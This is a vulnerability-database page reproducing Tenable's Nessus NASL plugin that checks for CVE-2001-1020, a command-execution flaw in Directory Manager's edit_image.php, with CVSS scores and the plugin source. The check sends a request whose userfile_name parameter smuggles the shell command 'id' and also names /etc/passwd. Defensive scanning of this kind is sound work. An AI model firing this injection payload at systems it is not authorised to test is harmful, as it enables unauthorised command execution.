Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2002-2021 and is owned by Tenable, Inc. or an Affiliate thereof.DIRECTORY_MANAGER.NASL
HistoryAug 22, 2002 - 12:00 a.m.

Directory Manager edit_image.php Arbitrary Command Execution

2002-08-2200:00:00
This script is Copyright (C) 2002-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
19

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.025 Low

EPSS

Percentile

90.2%

JSON

Directory Manager is installed and does not properly filter user input.
A remote attacker may use this flaw to execute arbitrary commands.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if(description)
{
 script_id(11104);
 script_version("1.25");

 script_cve_id("CVE-2001-1020");
 script_bugtraq_id(3288);
 
 script_name(english:"Directory Manager edit_image.php Arbitrary Command Execution");
 script_summary(english:"Tries to use edit_image.php to execute a command");
 
 script_set_attribute(attribute:"synopsis", value:
"The web application running on the remote host has a command
execution vulnerability." );
 script_set_attribute(attribute:"description", value:
"Directory Manager is installed and does not properly filter user input.
A remote attacker may use this flaw to execute arbitrary commands." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Sep/49" );
 script_set_attribute(attribute:"solution", value:
"Upgrade your software or firewall your web server." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/09/05");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
 script_family(english:"CGI abuses");

 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 script_require_keys("www/PHP");
 exit(0);
}

#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if(!can_host_php(port:port)) exit(0);


http_check_remote_code (
			check_request:"/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20",
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id",
			port:port
			);

Related

openvas 2
nvd 1
cvelist 1
cve 1
openvas
openvas
Directory Manager's edit_image.php
2008-10-24 00:00:00
Directory Manager
2008-10-24 00:00:00
nvd
nvd
CVE-2001-1020
2001-09-05 04:00:00
cvelist
cvelist
CVE-2001-1020
2002-03-09 05:00:00
cve
cve
CVE-2001-1020
2002-03-09 05:00:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.025 Low

EPSS

Percentile

90.2%

JSON
Related for DIRECTORY_MANAGER.NASL
openvas2nvd1cvelist1cve1